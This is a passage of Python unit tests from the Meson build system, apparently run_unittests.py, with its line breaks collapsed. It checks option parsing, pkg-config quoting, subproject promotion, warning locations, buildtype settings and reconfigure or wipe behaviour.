os.unlink(stlibfile) os.unlink(shlibfile) if mesonbuild.mesonlib.is_windows(): # Clean up all the garbage MSVC writes in the # source tree. for fname in glob(os.path.join(testdir, 'foo.*')): if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']: os.unlink(fname) @skipIfNoPkgconfig @mock.patch.dict(os.environ) def test_pkgconfig_gen_escaping(self): testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') prefix = '/usr/with spaces' libdir = 'lib' self.init(testdir, extra_args=['--prefix=' + prefix, '--libdir=' + libdir]) # Find foo dependency os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir env = get_fake_env(testdir, self.builddir, self.prefix) kwargs = {'required': True, 'silent': True} foo_dep = PkgConfigDependency('libfoo', env, kwargs) # Ensure link_args are properly quoted libdir = PurePath(prefix) / PurePath(libdir) link_args = ['-L' + libdir.as_posix(), '-lfoo'] self.assertEqual(foo_dep.get_link_args(), link_args) # Ensure include args are properly quoted incdir = PurePath(prefix) / PurePath('include') cargs = ['-I' + incdir.as_posix(), '-DLIBFOO'] # pkg-config and pkgconf does not respect the same order self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs)) def test_array_option_change(self): def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': ['foo', 'bar'], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir) original = get_opt() self.assertDictEqual(original, expected) expected['value'] = ['oink', 'boink'] self.setconf('-Dlist=oink,boink') changed = get_opt() self.assertEqual(changed, expected) def test_array_option_bad_change(self): def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': ['foo', 'bar'], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir) original = get_opt() self.assertDictEqual(original, expected) with self.assertRaises(subprocess.CalledProcessError): self.setconf('-Dlist=bad') changed = get_opt() self.assertDictEqual(changed, expected) def test_array_option_empty_equivalents(self): """Array options treat -Dopt=[] and -Dopt= as equivalent.""" def get_opt(): opts = self.introspect('--buildoptions') for x in opts: if x.get('name') == 'list': return x raise Exception(opts) expected = { 'name': 'list', 'description': 'list', 'section': 'user', 'type': 'array', 'value': [], 'machine': 'any', } tdir = os.path.join(self.unit_test_dir, '19 array option') self.init(tdir, extra_args='-Dlist=') original = get_opt() self.assertDictEqual(original, expected) def opt_has(self, name, value): res = self.introspect('--buildoptions') found = False for i in res: if i['name'] == name: self.assertEqual(i['value'], value) found = True break self.assertTrue(found, "Array option not found in introspect data.") def test_free_stringarray_setting(self): testdir = os.path.join(self.common_test_dir, '41 options') self.init(testdir) self.opt_has('free_array_opt', []) self.setconf('-Dfree_array_opt=foo,bar', will_build=False) self.opt_has('free_array_opt', ['foo', 'bar']) self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False) self.opt_has('free_array_opt', ['a,b', 'c,d']) # When running under Travis Mac CI, the file updates seem to happen # too fast so the timestamps do not get properly updated. # Call this method before file operations in appropriate places # to make things work. def mac_ci_delay(self): if is_osx() and is_ci(): import time time.sleep(1) def test_options_with_choices_changing(self) -> None: """Detect when options like arrays or combos have their choices change.""" testdir = Path(os.path.join(self.unit_test_dir, '85 change option choices')) options1 = str(testdir / 'meson_options.1.txt') options2 = str(testdir / 'meson_options.2.txt') # Test that old options are changed to the new defaults if they are not valid real_options = str(testdir / 'meson_options.txt') self.addCleanup(os.unlink, real_options) shutil.copy(options1, real_options) self.init(str(testdir)) self.mac_ci_delay() shutil.copy(options2, real_options) self.build() opts = self.introspect('--buildoptions') for item in opts: if item['name'] == 'combo': self.assertEqual(item['value'], 'b') self.assertEqual(item['choices'], ['b', 'c', 'd']) elif item['name'] == 'arr': self.assertEqual(item['value'], ['b']) self.assertEqual(item['choices'], ['b', 'c', 'd']) self.wipe() self.mac_ci_delay() # When the old options are valid they should remain shutil.copy(options1, real_options) self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c']) self.mac_ci_delay() shutil.copy(options2, real_options) self.build() opts = self.introspect('--buildoptions') for item in opts: if item['name'] == 'combo': self.assertEqual(item['value'], 'c') self.assertEqual(item['choices'], ['b', 'c', 'd']) elif item['name'] == 'arr': self.assertEqual(item['value'], ['b', 'c']) self.assertEqual(item['choices'], ['b', 'c', 'd']) def test_subproject_promotion(self): testdir = os.path.join(self.unit_test_dir, '12 promote') workdir = os.path.join(self.builddir, 'work') shutil.copytree(testdir, workdir) spdir = os.path.join(workdir, 'subprojects') s3dir = os.path.join(spdir, 's3') scommondir = os.path.join(spdir, 'scommon') self.assertFalse(os.path.isdir(s3dir)) subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir, stdout=subprocess.DEVNULL) self.assertTrue(os.path.isdir(s3dir)) self.assertFalse(os.path.isdir(scommondir)) self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'], cwd=workdir, stdout=subprocess.DEVNULL), 0) self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'], cwd=workdir, stderr=subprocess.DEVNULL), 0) self.assertFalse(os.path.isdir(scommondir)) subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir) self.assertTrue(os.path.isdir(scommondir)) promoted_wrap = os.path.join(spdir, 'athing.wrap') self.assertFalse(os.path.isfile(promoted_wrap)) subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir) self.assertTrue(os.path.isfile(promoted_wrap)) self.init(workdir) self.build() def test_subproject_promotion_wrap(self): testdir = os.path.join(self.unit_test_dir, '44 promote wrap') workdir = os.path.join(self.builddir, 'work') shutil.copytree(testdir, workdir) spdir = os.path.join(workdir, 'subprojects') ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap') self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'], cwd=workdir, stdout=subprocess.DEVNULL), 0) self.assertFalse(os.path.isfile(ambiguous_wrap)) subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir) self.assertTrue(os.path.isfile(ambiguous_wrap)) def test_warning_location(self): tdir = os.path.join(self.unit_test_dir, '22 warning location') out = self.init(tdir) for expected in [ r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.', r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.', r'meson.build:6: WARNING: a warning of some sort', r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning', r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.', r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.", r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".', ]: self.assertRegex(out, re.escape(expected)) for wd in [ self.src_root, self.builddir, os.getcwd(), ]: self.new_builddir() out = self.init(tdir, workdir=wd) expected = os.path.join(relpath(tdir, self.src_root), 'meson.build') relwd = relpath(self.src_root, wd) if relwd != '.': expected = os.path.join(relwd, expected) expected = '\n' + expected + ':' self.assertIn(expected, out) def test_error_location_path(self): '''Test locations in meson errors contain correct paths''' # this list contains errors from all the different steps in the # lexer/parser/interpreter we have tests for. for (t, f) in [ ('10 out of bounds', 'meson.build'), ('18 wrong plusassign', 'meson.build'), ('61 bad option argument', 'meson_options.txt'), ('102 subdir parse error', os.path.join('subdir', 'meson.build')), ('103 invalid option file', 'meson_options.txt'), ]: tdir = os.path.join(self.src_root, 'test cases', 'failing', t) for wd in [ self.src_root, self.builddir, os.getcwd(), ]: try: self.init(tdir, workdir=wd) except subprocess.CalledProcessError as e: expected = os.path.join('test cases', 'failing', t, f) relwd = relpath(self.src_root, wd) if relwd != '.': expected = os.path.join(relwd, expected) expected = '\n' + expected + ':' self.assertIn(expected, e.output) else: self.fail('configure unexpectedly succeeded') def test_permitted_method_kwargs(self): tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs') out = self.init(tdir) for expected in [ r'WARNING: Passed invalid keyword argument "prefixxx".', r'WARNING: Passed invalid keyword argument "argsxx".', r'WARNING: Passed invalid keyword argument "invalidxx".', ]: self.assertRegex(out, re.escape(expected)) def test_templates(self): ninja = detect_ninja() if ninja is None: raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.') langs = ['c'] env = get_fake_env() for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']: try: comp = getattr(env, f'detect_{l}_compiler')(MachineChoice.HOST) with tempfile.TemporaryDirectory() as d: comp.sanity_check(d, env) langs.append(l) except EnvironmentException: pass for lang in langs: for target_type in ('executable', 'library'): # test empty directory with tempfile.TemporaryDirectory() as tmpdir: self._run(self.meson_command + ['init', '--language', lang, '--type', target_type], workdir=tmpdir) self._run(self.setup_command + ['--backend=ninja', 'builddir'], workdir=tmpdir) self._run(ninja, workdir=os.path.join(tmpdir, 'builddir')) # test directory with existing code file if lang in {'c', 'cpp', 'd'}: with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f: f.write('int main(void) {}') self._run(self.meson_command + ['init', '-b'], workdir=tmpdir) elif lang in {'java'}: with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f: f.write('public class Foo { public static void main() {} }') self._run(self.meson_command + ['init', '-b'], workdir=tmpdir) def test_compiler_run_command(self): ''' The test checks that the compiler object can be passed to run_command(). ''' testdir = os.path.join(self.unit_test_dir, '24 compiler run_command') self.init(testdir) def test_identical_target_name_in_subproject_flat_layout(self): ''' Test that identical targets in different subprojects do not collide if layout is flat. ''' testdir = os.path.join(self.common_test_dir, '173 identical target name in subproject flat layout') self.init(testdir, extra_args=['--layout=flat']) self.build() def test_identical_target_name_in_subdir_flat_layout(self): ''' Test that identical targets in different subdirs do not collide if layout is flat. ''' testdir = os.path.join(self.common_test_dir, '182 same target name flat layout') self.init(testdir, extra_args=['--layout=flat']) self.build() def test_flock(self): exception_raised = False with tempfile.TemporaryDirectory() as tdir: os.mkdir(os.path.join(tdir, 'meson-private')) with BuildDirLock(tdir): try: with BuildDirLock(tdir): pass except MesonException: exception_raised = True self.assertTrue(exception_raised, 'Double locking did not raise exception.') @unittest.skipIf(is_osx(), 'Test not applicable to OSX') def test_check_module_linking(self): """ Test that link_with: a shared module issues a warning https://github.com/mesonbuild/meson/issues/2865 (That an error is raised on OSX is exercised by test failing/78) """ tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking') out = self.init(tdir) msg = ('WARNING: target links against shared modules. This is not ' 'recommended as it is not supported on some platforms') self.assertIn(msg, out) def test_ndebug_if_release_disabled(self): testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release') self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release']) self.build() exe = os.path.join(self.builddir, 'main') self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip()) def test_ndebug_if_release_enabled(self): testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release') self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release']) self.build() exe = os.path.join(self.builddir, 'main') self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip()) def test_guessed_linker_dependencies(self): ''' Test that meson adds dependencies for libraries based on the final linker command line. ''' testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies') testdirlib = os.path.join(testdirbase, 'lib') extra_args = None libdir_flags = ['-L'] env = get_fake_env(testdirlib, self.builddir, self.prefix) if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}: # msvc-like compiler, also test it with msvc-specific flags libdir_flags += ['/LIBPATH:', '-LIBPATH:'] else: # static libraries are not linkable with -l with msvc because meson installs them # as .a files which unix_args_to_native will not know as it expects libraries to use # .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc # this tests needs to use shared libraries to test the path resolving logic in the # dependency generation code path. extra_args = ['--default-library', 'static'] initial_builddir = self.builddir initial_installdir = self.installdir for libdir_flag in libdir_flags: # build library self.new_builddir() self.init(testdirlib, extra_args=extra_args) self.build() self.install() libbuilddir = self.builddir installdir = self.installdir libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib') # build user of library self.new_builddir() # replace is needed because meson mangles platform paths passed via LDFLAGS self.init(os.path.join(testdirbase, 'exe'), override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))}) self.build() self.assertBuildIsNoop() # rebuild library exebuilddir = self.builddir self.installdir = installdir self.builddir = libbuilddir # Microsoft's compiler is quite smart about touching import libs on changes, # so ensure that there is actually a change in symbols. self.setconf('-Dmore_exports=true') self.build() self.install() # no ensure_backend_detects_changes needed because self.setconf did that already # assert user of library will be rebuild self.builddir = exebuilddir self.assertRebuiltTarget('app') # restore dirs for the next test case self.installdir = initial_builddir self.builddir = initial_installdir def test_conflicting_d_dash_option(self): testdir = os.path.join(self.unit_test_dir, '37 mixed command line args') with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as e: self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar']) # Just to ensure that we caught the correct error self.assertIn('as both', e.stderr) def _test_same_option_twice(self, arg, args): testdir = os.path.join(self.unit_test_dir, '37 mixed command line args') self.init(testdir, extra_args=args) opts = self.introspect('--buildoptions') for item in opts: if item['name'] == arg: self.assertEqual(item['value'], 'bar') return raise Exception('Missing {} value?'.format(arg)) def test_same_dash_option_twice(self): self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar']) def test_same_d_option_twice(self): self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar']) def test_same_project_d_option_twice(self): self._test_same_option_twice('one', ['-Done=foo', '-Done=bar']) def _test_same_option_twice_configure(self, arg, args): testdir = os.path.join(self.unit_test_dir, '37 mixed command line args') self.init(testdir) self.setconf(args) opts = self.introspect('--buildoptions') for item in opts: if item['name'] == arg: self.assertEqual(item['value'], 'bar') return raise Exception('Missing {} value?'.format(arg)) def test_same_dash_option_twice_configure(self): self._test_same_option_twice_configure( 'bindir', ['--bindir=foo', '--bindir=bar']) def test_same_d_option_twice_configure(self): self._test_same_option_twice_configure( 'bindir', ['-Dbindir=foo', '-Dbindir=bar']) def test_same_project_d_option_twice_configure(self): self._test_same_option_twice_configure( 'one', ['-Done=foo', '-Done=bar']) def test_command_line(self): testdir = os.path.join(self.unit_test_dir, '34 command line') # Verify default values when passing no args that affect the # configuration, and as a bonus, test that --profile-self works. self.init(testdir, extra_args=['--profile-self', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('default_library')].value, 'static') self.assertEqual(obj.options[OptionKey('warning_level')].value, '1') self.assertEqual(obj.options[OptionKey('set_sub_opt')].value, True) self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'default3') self.wipe() # warning_level is special, it's --warnlevel instead of --warning-level # for historical reasons self.init(testdir, extra_args=['--warnlevel=2', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '2') self.setconf('--warnlevel=3') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '3') self.wipe() # But when using -D syntax, it should be 'warning_level' self.init(testdir, extra_args=['-Dwarning_level=2', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '2') self.setconf('-Dwarning_level=3') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '3') self.wipe() # Mixing --option and -Doption is forbidden with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm: self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3']) if isinstance(cm.exception, subprocess.CalledProcessError): self.assertNotEqual(0, cm.exception.returncode) self.assertIn('as both', cm.exception.output) else: self.assertIn('as both', str(cm.exception)) self.init(testdir) with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm: self.setconf(['--warnlevel=1', '-Dwarning_level=3']) if isinstance(cm.exception, subprocess.CalledProcessError): self.assertNotEqual(0, cm.exception.returncode) self.assertIn('as both', cm.exception.output) else: self.assertIn('as both', str(cm.exception)) self.wipe() # --default-library should override default value from project() self.init(testdir, extra_args=['--default-library=both', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('default_library')].value, 'both') self.setconf('--default-library=shared') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared') if self.backend is Backend.ninja: # reconfigure target works only with ninja backend self.build('reconfigure') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared') self.wipe() # Should warn on unknown options out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo']) self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out) self.wipe() # Should fail on malformed option msg = "Option 'foo' must have a value separated by equals sign." with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm: self.init(testdir, extra_args=['-Dfoo']) if isinstance(cm.exception, subprocess.CalledProcessError): self.assertNotEqual(0, cm.exception.returncode) self.assertIn(msg, cm.exception.output) else: self.assertIn(msg, str(cm.exception)) self.init(testdir) with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm: self.setconf('-Dfoo') if isinstance(cm.exception, subprocess.CalledProcessError): self.assertNotEqual(0, cm.exception.returncode) self.assertIn(msg, cm.exception.output) else: self.assertIn(msg, str(cm.exception)) self.wipe() # It is not an error to set wrong option for unknown subprojects or # language because we don't have control on which one will be selected. self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1']) self.wipe() # Test we can set subproject option self.init(testdir, extra_args=['-Dsubp:subp_opt=foo', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'foo') self.wipe() # c_args value should be parsed with split_args self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo', '-Dbar', '-Dthird=one two']) self.setconf('-Dc_args="foo bar" one two') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['foo bar', 'one', 'two']) self.wipe() self.init(testdir, extra_args=['-Dset_percent_opt=myoption%', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('set_percent_opt')].value, 'myoption%') self.wipe() # Setting a 2nd time the same option should override the first value try: self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar', '-Dbuildtype=plain', '-Dbuildtype=release', '-Db_sanitize=address', '-Db_sanitize=thread', '-Dc_args=-Dfoo', '-Dc_args=-Dbar', '-Db_lundef=false', '--fatal-meson-warnings']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('bindir')].value, 'bar') self.assertEqual(obj.options[OptionKey('buildtype')].value, 'release') self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'thread') self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dbar']) self.setconf(['--bindir=bar', '--bindir=foo', '-Dbuildtype=release', '-Dbuildtype=plain', '-Db_sanitize=thread', '-Db_sanitize=address', '-Dc_args=-Dbar', '-Dc_args=-Dfoo']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('bindir')].value, 'foo') self.assertEqual(obj.options[OptionKey('buildtype')].value, 'plain') self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'address') self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo']) self.wipe() except KeyError: # Ignore KeyError, it happens on CI for compilers that does not # support b_sanitize. We have to test with a base option because # they used to fail this test with Meson 0.46 an earlier versions. pass def test_warning_level_0(self): testdir = os.path.join(self.common_test_dir, '208 warning level 0') # Verify default values when passing no args self.init(testdir) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '0') self.wipe() # verify we can override w/ --warnlevel self.init(testdir, extra_args=['--warnlevel=1']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '1') self.setconf('--warnlevel=0') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '0') self.wipe() # verify we can override w/ -Dwarning_level self.init(testdir, extra_args=['-Dwarning_level=1']) obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '1') self.setconf('-Dwarning_level=0') obj = mesonbuild.coredata.load(self.builddir) self.assertEqual(obj.options[OptionKey('warning_level')].value, '0') self.wipe() def test_feature_check_usage_subprojects(self): testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects') out = self.init(testdir) # Parent project warns correctly self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict") # Subprojects warn correctly self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler") self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler") # Subproject has a new-enough meson_version, no warning self.assertNotRegex(out, "WARNING: Project targeting.*Python") # Ensure a summary is printed in the subproject and the outer project self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'") self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}") self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'") self.assertRegex(out, " * 0.47.0: {'dict'}") def test_configure_file_warnings(self): testdir = os.path.join(self.common_test_dir, "14 configure file") out = self.init(testdir) self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*") self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*") self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*") self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in") # Warnings for configuration files that are overwritten. self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites") self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites") self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites") self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites") self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites") # No warnings about empty configuration data objects passed to files with substitutions self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in") self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in") with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f: self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */') with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f: self.assertEqual(f.read().strip(), b'') self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict") def test_dirs(self): with tempfile.TemporaryDirectory() as containing: with tempfile.TemporaryDirectory(dir=containing) as srcdir: mfile = os.path.join(srcdir, 'meson.build') of = open(mfile, 'w') of.write("project('foobar', 'c')\n") of.close() pc = subprocess.run(self.setup_command, cwd=srcdir, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL) self.assertIn(b'Must specify at least one directory name', pc.stdout) with tempfile.TemporaryDirectory(dir=srcdir) as builddir: subprocess.run(self.setup_command, check=True, cwd=builddir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def get_opts_as_dict(self): result = {} for i in self.introspect('--buildoptions'): result[i['name']] = i['value'] return result def test_buildtype_setting(self): testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'debug') self.assertEqual(opts['debug'], True) self.setconf('-Ddebug=false') opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], False) self.assertEqual(opts['buildtype'], 'plain') self.assertEqual(opts['optimization'], '0') # Setting optimizations to 3 should cause buildtype # to go to release mode. self.setconf('-Doptimization=3') opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'release') self.assertEqual(opts['debug'], False) self.assertEqual(opts['optimization'], '3') # Going to debug build type should reset debugging # and optimization self.setconf('-Dbuildtype=debug') opts = self.get_opts_as_dict() self.assertEqual(opts['buildtype'], 'debug') self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '0') # Command-line parsing of buildtype settings should be the same as # setting with `meson configure`. # # Setting buildtype should set optimization/debug self.new_builddir() self.init(testdir, extra_args=['-Dbuildtype=debugoptimized']) opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') # Setting optimization/debug should set buildtype self.new_builddir() self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true']) opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') # Setting both buildtype and debug on the command-line should work, and # should warn not to do that. Also test that --debug is parsed as -Ddebug=true self.new_builddir() out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug']) self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant') opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') @skipIfNoPkgconfig @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows') def test_native_dep_pkgconfig(self): testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var') with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile: crossfile.write(textwrap.dedent( '''[binaries] pkgconfig = '{0}' [properties] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' endian = 'little' '''.format(os.path.join(testdir, 'cross_pkgconfig.py')))) crossfile.flush() self.meson_cross_file = crossfile.name env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')} self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env) self.wipe() self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env) @skipIfNoPkgconfig @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows') def test_pkg_config_libdir(self): testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var') with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile: crossfile.write(textwrap.dedent( '''[binaries] pkgconfig = 'pkg-config' [properties] pkg_config_libdir = ['{0}'] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' endian = 'little' '''.format(os.path.join(testdir, 'cross_pkgconfig')))) crossfile.flush() self.meson_cross_file = crossfile.name env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')} self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env) self.wipe() self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env) def __reconfigure(self, change_minor=False): # Set an older version to force a reconfigure from scratch filename = os.path.join(self.privatedir, 'coredata.dat') with open(filename, 'rb') as f: obj = pickle.load(f) if change_minor: v = mesonbuild.coredata.version.split('.') obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)]) else: obj.version = '0.47.0' with open(filename, 'wb') as f: pickle.dump(obj, f) def test_reconfigure(self): testdir = os.path.join(self.unit_test_dir, '48 reconfigure') self.init(testdir, extra_args=['-Dopt1=val1']) self.setconf('-Dopt2=val2') self.__reconfigure() out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3']) self.assertRegex(out, 'Regenerating configuration from scratch') self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 default4') self.build() self.run_tests() # Create a file in builddir and verify wipe command removes it filename = os.path.join(self.builddir, 'something') open(filename, 'w').close() self.assertTrue(os.path.exists(filename)) out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4']) self.assertFalse(os.path.exists(filename)) self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 val4') self.build() self.run_tests() def test_wipe_from_builddir(self): testdir = os.path.join(self.common_test_dir, '158 custom target subdir depend files') self.init(testdir) self.__reconfigure() with Path(self.builddir): self.init(testdir, extra_args=['--wipe']) def test_minor_version_does_not_reconfigure_wipe(self): testdir = os.path.join(self.unit_test_dir, '48 reconfigure') self.init(testdir, extra_args=['-Dopt1=val1']) self.setconf('-Dopt2=val2') self.__reconfigure(change_minor=True) out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3']) self.assertNotRegex(out, 'Regenerating configuration from scratch') self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 default4') self.build() self.run_tests() def test_target_construct_id_from_path(self): # This id is stable but not guessable. # The test is supposed to prevent unintentional # changes of target ID generation. target_id = Target.construct_id_from_path('some/obscure/subdir', 'target-id', '@suffix') self.assertEqual('5e002d3@@target-id@suffix', target_id) target_id = Target.construct_id_from_path('subproject/foo/subdir/bar', 'target2-id', '@other') self.assertEqual('81d46d1@@target2-id@other', target_id) def test_introspect_projectinfo_without_configured_build(self): 